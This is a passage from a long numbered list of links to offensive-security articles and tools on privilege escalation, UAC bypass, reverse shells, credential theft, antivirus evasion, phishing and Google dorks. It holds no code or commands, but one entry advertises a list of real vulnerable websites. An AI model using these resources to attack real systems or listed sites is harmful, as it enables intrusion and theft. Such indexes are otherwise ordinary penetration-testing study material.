IoT Space so that we can address them (hopefully): https://github.com/nebgnahz/awesome-iot-hacks -281-A Course on Intermediate Level Linux Exploitation: https://github.com/nnamon/linux-exploitation-course -282-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -283-A curated list of awesome infosec courses and training resources.: https://github.com/onlurking/awesome-infosec -284-A curated list of resources for learning about application security: https://github.com/paragonie/awesome-appsec -285-an awesome list of honeypot resources: https://github.com/paralax/awesome-honeypots 286-GitHub Enterprise SQL Injection: https://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493 -287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis: https://github.com/secfigo/Awesome-Fuzzing -288-PHP htaccess injection cheat sheet: https://github.com/sektioneins/pcc/wiki -289-A curated list of the awesome resources about the Vulnerability Research: https://github.com/sergey-pronin/Awesome-Vulnerability-Research -290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF: https://github.com/swisskyrepo/PayloadsAllTheThings -291-A collection of Red Team focused tools, scripts, and notes: https://github.com/threatexpress/red-team-scripts -292-Awesome XSS stuff: https://github.com/UltimateHackers/AwesomeXSS -293-A collection of hacking / penetration testing resources to make you better!: https://github.com/vitalysim/Awesome-Hacking-Resources -294-Docker Cheat Sheet: https://github.com/wsargent/docker-cheat-sheet -295-Decrypted content of eqgrp-auction-file.tar.xz: https://github.com/x0rz/EQGRP -296-A bunch of links related to Linux kernel exploitation: https://github.com/xairy/linux-kernel-exploitation -297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -298-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -299-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: -301-Reading Your Way Around UAC (Part 1): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html -302--Reading Your Way Around UAC (Part 2): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html -303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2): https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/ -304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/p/29d034c27978 -304-Automating Cobalt Strike,Aggressor Collection Scripts: https://github.com/bluscreenofjeff/AggressorScripts https://github.com/harleyQu1nn/AggressorScripts -305-Vi Cheat Sheet: https://highon.coffee/blog/vi-cheat-sheet/ -306-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -307-LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/ -308-Systemd Cheat Sheet: https://highon.coffee/blog/systemd-cheat-sheet/ -309-Aircrack-ng Cheatsheet: https://securityonline.info/aircrack-ng-cheatsheet/ -310-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/?p=7212 -311-Wifi Pentesting Command Cheatsheet: https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/ -312-Android Testing Environment Cheatsheet (Part 1): https://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/ -313-cheatsheet: https://randomkeystrokes.com/category/cheatsheet/ -314-Reverse Shell Cheat Sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/ -315-Linux Commands Cheat Sheet: https://highon.coffee/blog/linux-commands-cheat-sheet/ -316-Linux Privilege Escalation using Sudo Rights: http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights -317-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -318-Linux Privilege Escalation by Exploiting Cronjobs: http://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ -319-Web Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -320-Webshell to Meterpreter: http://www.hackingarticles.in/webshell-to-meterpreter -321-WordPress Penetration Testing using WPScan & Metasploit: http://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit -322-XSS Exploitation in DVWA (Bypass All Security): http://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security -323-Linux Privilege Escalation Using PATH Variable: http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -324-VNC tunneling over SSH: http://www.hackingarticles.in/vnc-tunneling-ssh -325-VNC Pivoting through Meterpreter: http://www.hackingarticles.in/vnc-pivoting-meterpreter -326-Week of Evading Microsoft ATA - Announcement and Day 1: https://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html -327-Abusing DNSAdmins privilege for escalation in Active Directory: https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html -328-Using SQL Server for attacking a Forest Trust: https://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html -329-Empire : http://www.harmj0y.net/blog/category/empire/ -330-8 Deadly Commands You Should Never Run on Linux: https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/ -331-External C2 framework for Cobalt Strike: https://www.insomniacsecurity.com/2018/01/11/externalc2.html -332-How to use Public IP on Kali Linux: http://www.hackingarticles.in/use-public-ip-kali-linux -333-Bypass Admin access through guest Account in windows 10: http://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10 -334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports): http://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports -335-Bypass SSH Restriction by Port Relay: http://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay -336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key): http://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key -337-Bypass UAC in Windows 10 using bypass_comhijack Exploit: http://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit -338-Bind Payload using SFX archive with Trojanizer: http://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer -339-Capture NTLM Hashes using PDF (Bad-Pdf): http://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf -340-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/ -341-Detect SQL Injection Attack using Snort IDS: http://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/ -342-Beginner Guide to Website Footprinting: http://www.hackingarticles.in/beginner-guide-website-footprinting/ -343-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -344-Wifi Post Exploitation on Remote PC: http://www.hackingarticles.in/wifi-post-exploitation-remote-pc/ -335-Check Meltdown Vulnerability in CPU: http://www.hackingarticles.in/check-meltdown-vulnerability-cpu -336-XXE: https://phonexicum.github.io/infosec/xxe.html -337-[XSS] Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -338-Engagement Tools Tutorial in Burp suite: http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite -339-Wiping Out CSRF: https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f -340-First entry: Welcome and fileless UAC bypass: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ -341-Writing a Custom Shellcode Encoder: https://medium.com/p/31816e767611 -342-Security Harden CentOS 7 : https://highon.coffee/blog/security-harden-centos-7/ -343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS: https://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html -344-MySQL: https://websec.ca/kb/CHANGELOG.txt -345-Deobfuscation of VM based software protection: http://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf -346-Online Assembler and Disassembler: http://shell-storm.org/online/Online-Assembler-and-Disassembler/ -347-Shellcodes database for study cases: http://shell-storm.org/shellcode/ -348-Dynamic Binary Analysis and Obfuscated Codes: http://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf -349-How Triton may help to analyse obfuscated binaries: http://triton.quarkslab.com/files/misc82-triton.pdf -350-Triton: A Concolic Execution Framework: http://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf -351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM: https://github.com/JonathanSalwan/Tigress_protection -352-What kind of semantics information Triton can provide?: http://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/ -353-Code coverage using a dynamic symbolic execution: http://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/ -354-Triton (concolic execution framework) under the hood: http://triton.quarkslab.com/blog/first-approach-with-the-framework/ -355-- Stack and heap overflow detection at runtime via behavior analysis and Pin: http://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/ -356-Binary analysis: Concolic execution with Pin and z3: http://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/ -357-In-Memory fuzzing with Pin: http://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/ -358-Hackover 2015 r150 (outdated solving for Triton use cases): https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py -359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection: https://gbhackers.com/skipfish-web-application-security-scanner -360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains: https://gbhackers.com/sublist3r-penetration-testers -361-bypassing application whitelisting with bginfo: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ -362-accessing-clipboard-from-the-lock-screen-in-windows-10: https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/ -363-bypassing-device-guard-umci-using-chm-cve-2017-8625: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ -364-defense-in-depth-writeup: https://oddvar.moe/2017/09/13/defense-in-depth-writeup/ -365-applocker-case-study-how-insecure-is-it-really-part-1: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -366-empires-cross-platform-office-macro: https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/ -367-recon tools: https://blackarch.org/recon.html -368-Black Hat 2018 tools list: https://medium.com/p/991fa38901da -369-Application Introspection & Hooking With Frida: https://www.fuzzysecurity.com/tutorials/29.html -370-And I did OSCP!: https://medium.com/p/589babbfea19 -371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests: https://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html -372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals: https://gbhackers.com/threat-intelligence-tools -373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: https://techincidents.com/penetration-testing-cheat-sheet/ -374-privilege escalation: https://toshellandback.com/category/privilege-escalation/ -375-The Complete List of Windows Post-Exploitation Commands (No Powershell): https://medium.com/p/999b5433b61e -376-The Art of Subdomain Enumeration: https://blog.sweepatic.com/tag/subdomain-enumeration/ -377-The Principles of a Subdomain Takeover: https://blog.sweepatic.com/subdomain-takeover-principles/ -378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!: https://medium.com/p/b250fb40af82 -379-The Solution for Web for Pentester-I: https://medium.com/p/4c21b3ae9673 -380-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended: https://www.hackingloops.com/hacking-tricks/ -383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology: https://www.hackingloops.com/exploitation-terminology/ -384-How Hackers Kick Victims Off of Wireless Networks: https://www.hackingloops.com/kick-victims-off-of-wireless-networks/ -385-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -386-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom: https://www.hackingloops.com/msfvenom/ -388-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky: https://www.hackingloops.com/payloads-via-usb-rubber-ducky/ -390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1: https://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/ -391-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -392-Cracking NTLMv1 Handshakes with Crack.sh: http://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/ -393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch: https://medium.com/p/d5e92843e64a -394-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -395-Windows Privilege Escalation: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation -396-Removing Sender’s IP Address From Email’s Received: From Header: https://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header -397-Dump Cleartext Password in Linux PC using MimiPenguin: http://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin -398-Embedded Backdoor with Image using FakeImageExploiter: http://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter -399-Exploit Command Injection Vulnearbility with Commix and Netcat: http://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat -400-Exploiting Form Based Sql Injection using Sqlmap: http://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap -401-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -402-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks -403-Command Injection to Meterpreter using Commix: http://www.hackingarticles.in/command-injection-meterpreter-using-commix -404-Comprehensive Guide to Crunch Tool: http://www.hackingarticles.in/comprehensive-guide-to-crunch-tool -405-Compressive Guide to File Transfer (Post Exploitation): http://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation -406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide): http://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng -407-How to Detect Meterpreter in Your PC: http://www.hackingarticles.in/detect-meterpreter-pc -408-Easy way to Hack Database using Wizard switch in Sqlmap: http://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap -409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn): http://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn -410-Create SSL Certified Meterpreter Payload using MPM: http://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm -411-Port forwarding: A practical hands-on guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide -412-Exploit Dev 101: Jumping to Shellcode: https://www.abatchy.com/2017/05/jumping-to-shellcode.html -413-Introduction to Manual Backdooring: https://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html -414-Kernel Exploitation: https://www.abatchy.com/2018/01/kernel-exploitation-1 -415-Exploit Dev 101: Bypassing ASLR on Windows: https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html -416-Shellcode reduction tips (x86): https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86 -417-OSCE Study Plan: https://www.abatchy.com/2017/03/osce-study-plan -418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400): https://www.abatchy.com/2017/10/defcamp-dotnot -419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE: https://www.ambionics.io/ -420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]: https://www.cityofhackerz.com/sql-vulnerable-websites-list-2017 -421-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/tag/forensics/ -422-windows-kernel-logic-bug-class-access: https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html -423-injecting-code-into-windows-protected: https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html -424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE: https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire -425-Automated Derivative Administrator Search: https://wald0.com/?p=14 -426-A Red Teamer’s Guide to GPOs and OUs: https://wald0.com/?p=179 -427-Pen Testing and Active Directory, Part VI: The Final Case: https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/ -428-Offensive Tools and Techniques: https://www.sec.uno/2017/03/01/offensive-tools-and-techniques/ -429-Three penetration testing tips to out-hack hackers: http://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/ -430-Introducing BloodHound: https://wald0.com/?p=68 -431-Red + Blue = Purple: http://www.blackhillsinfosec.com/?p=5368 -432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog: https://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/ -433-PrivEsc: Unquoted Service Path: https://www.gracefulsecurity.com/privesc-unquoted-service-path/ -434-PrivEsc: Insecure Service Permissions: https://www.gracefulsecurity.com/privesc-insecure-service-permissions/ -435-PrivEsc: DLL Hijacking: https://www.gracefulsecurity.com/privesc-dll-hijacking/ -436-Android Reverse Engineering 101 – Part 1: http://www.fasteque.com/android-reverse-engineering-101-part-1/ -437-Luckystrike: An Evil Office Document Generator: https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator -438-the-number-one-pentesting-tool-youre-not-using: https://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using -439-uac-bypass: http://www.securitynewspaper.com/tag/uac-bypass/ -440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities: https://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities -441-Penetration Testing on X11 Server: http://www.hackingarticles.in/penetration-testing-on-x11-server -442-Always Install Elevated: https://pentestlab.blog/2017/02/28/always-install-elevated -443-Scanning for Active Directory Privileges & Privileged Accounts: https://adsecurity.org/?p=3658 -444-Windows Server 2016 Active Directory Features: https://adsecurity.org/?p=3646 -445-powershell: https://adsecurity.org/?tag=powershell -446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection: https://adsecurity.org/?p=2921 -447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack: https://adsecurity.org/?p=3214 -448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation): https://adsecurity.org/?p=2085 -449-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -450-Background: Microsoft Ofice Exploitation: https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/ -451-Automated XSS Finder: https://medium.com/p/4236ed1c6457 -452-Application whitelist bypass using XLL and embedded shellcode: https://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc -453-AppLocker Bypass – Regsvr32: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32 -454-Nmap Scans using Hex Value of Flags: http://www.hackingarticles.in/nmap-scans-using-hex-value-flags -455-Nmap Scan with Timing Parameters: http://www.hackingarticles.in/nmap-scan-with-timing-parameters -456-OpenSSH User Enumeration Time- Based Attack with Osueta: http://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta -457-Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -458-Penetration Testing on Remote Desktop (Port 3389): http://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389 -459-Penetration Testing on Telnet (Port 23): http://www.hackingarticles.in/penetration-testing-telnet-port-23 -460-Penetration Testing in Windows/Active Directory with Crackmapexec: http://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec -461-Penetration Testing in WordPress Website using WordPress Exploit Framework: http://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework -462-Port Scanning using Metasploit with IPTables: http://www.hackingarticles.in/port-scanning-using-metasploit-iptables -463-Post Exploitation Using WMIC (System Command): http://www.hackingarticles.in/post-exploitation-using-wmic-system-command -464-Privilege Escalation in Linux using etc/passwd file: http://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file -465-RDP Pivoting with Metasploit: http://www.hackingarticles.in/rdp-pivoting-metasploit -466-A New Way to Hack Remote PC using Xerosploit and Metasploit: http://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit -467-Shell to Meterpreter using Session Command: http://www.hackingarticles.in/shell-meterpreter-using-session-command -468-SMTP Pentest Lab Setup in Ubuntu (Port 25): http://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu -469-SNMP Lab Setup and Penetration Testing: http://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing -470-SQL Injection Exploitation in Multiple Targets using Sqlmap: http://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap -471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin): http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin -472-SSH Penetration Testing (Port 22): http://www.hackingarticles.in/ssh-penetration-testing-port-22 -473-Manual Post Exploitation on Windows PC (System Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command -474-SSH Pivoting using Meterpreter: http://www.hackingarticles.in/ssh-pivoting-using-meterpreter -475-Stealing Windows Credentials of Remote PC with MS Office Document: http://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document -476-Telnet Pivoting through Meterpreter: http://www.hackingarticles.in/telnet-pivoting-meterpreter -477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin): http://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin -478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit: http://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit -479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit: http://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit -480-Hack Remote Windows 10 PC using TheFatRat: http://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat -481-2 Ways to Hack Windows 10 Password Easy Way: http://www.hackingarticles.in/hack-windows-10-password-easy-way -482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack): http://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack -483-How to Delete ALL Files in Remote Windows PC: http://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2 -484-How to Encrypt Drive of Remote Victim PC: http://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc -485-Post Exploitation in Linux With Metasploit: https://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit -486-Red Team: https://posts.specterops.io/tagged/red-team?source=post -487-Code Signing Certi cate Cloning Attacks and Defenses: https://posts.specterops.io/tagged/code-signing?source=post -488-Phishing: https://posts.specterops.io/tagged/phishing?source=post -489-PowerPick – A ClickOnce Adjunct: http://www.sixdub.net/?p=555 -490-sql-injection-xss-playground: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground -491-Privilege Escalation & Post-Exploitation: https://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md -492-https-payload-and-c2-redirectors: https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41 -493-a-push-toward-transparency: https://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41 -494-bloodhound: https://posts.specterops.io/tagged/bloodhound?source=post -495-active directory: https://posts.specterops.io/tagged/active-directory?source=post -496-Load & Execute Bundles with migrationTool: https://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41 -497-Outlook Forms and Shells: https://sensepost.com/blog/2017/outlook-forms-and-shells/ -498-Tools: https://sensepost.com/blog/tools/ -499-2018 pentesting resources: https://sensepost.com/blog/2018/ -500-network pentest: https://securityonline.info/category/penetration-testing/network-pentest/ -501-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -502-Stored XSS on Facebook: https://opnsec.com/2018/03/stored-xss-on-facebook/ -503-vulnerabilities: https://www.brokenbrowser.com/category/vulnerabilities/ -504-Extending BloodHound: Track and Visualize Your Compromise: https://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise -505-so-you-want-to-be-a-web-security-researcher: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher -506-BugBounty — AWS S3 added to my “Bucket” list!: https://medium.com/p/f68dd7d0d1ce -507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company: https://medium.com/p/c75967392c7e -508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty: https://medium.com/p/159525a9cb62 -509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account: https://medium.com/p/783f71131b94 -510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -511-Ping Power — ICMP Tunnel: https://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41 -512-hacking: https://www.nextleveltricks.com/hacking/ -513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !: https://www.nextleveltricks.com/youtube-channels-to-learn-hacking/ -514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi: https://www.nextleveltricks.com/latest-google-dorks-list/ -515-Art of Shellcoding: Basic AES Shellcode Crypter: http://www.nipunjaswal.com/2018/02/shellcode-crypter.html -516-Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/ -517-nmap-cheatsheet: https://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/ -518-Aws Recon: https://enciphers.com/tag/aws-recon/ -519-Recon: https://enciphers.com/tag/recon/ -520-Subdomain Enumeration: https://enciphers.com/tag/subdomain-enumeration/ -521-Shodan: https://enciphers.com/tag/shodan/ -522-Dump LAPS passwords with ldapsearch: https://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/ -523-peepdf - PDF Analysis Tool: http://eternal-todo.com/tools/peepdf-pdf-analysis-tool -524-Evilginx 2 - Next Generation of Phishing 2FA Tokens: breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/ -526-Evil XML with two encodings: https://mohemiv.com/all/evil-xml/ -527-create-word-macros-with-powershell: https://4sysops.com/archives/create-word-macros-with-powershell/ -528-Excess XSS A comprehensive tutorial on cross-site scripting: https://excess-xss.com/ -529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -530-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -532-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -533-“Practical recon techniques for bug hunters & pen testers”: https://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41 -534-Exploiting Node.js deserialization bug for Remote Code Execution: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ -535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege: http://www.greyhathacker.net/?p=1006 -536-Running Macros via ActiveX Controls: http://www.greyhathacker.net/?p=948 -537-all=BUG+MALWARE+EXPLOITS http://www.greyhathacker.net/?cat=18 -538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking -539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests: https://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/ -541-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe -542-File Upload XSS: https://medium.com/p/83ea55bb9a55 -543-Firebase Databases: https://medium.com/p/f651a7d49045 -544-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac -545-RED-TEAM: https://cybersyndicates.com/tags/red-team/ -546-Egressing Bluecoat with Cobaltstike & Let's Encrypt: https://www.youtube.com/watch?v=cgwfjCmKQwM -547-Veil-Evasion: https://cybersyndicates.com/tags/veil-evasion/ -548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -549-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -550-Don’t leak sensitive data via security scanning tools: https://medium.com/p/7d1f715f0486 -551-CRLF Injection Into PHP’s cURL Options: 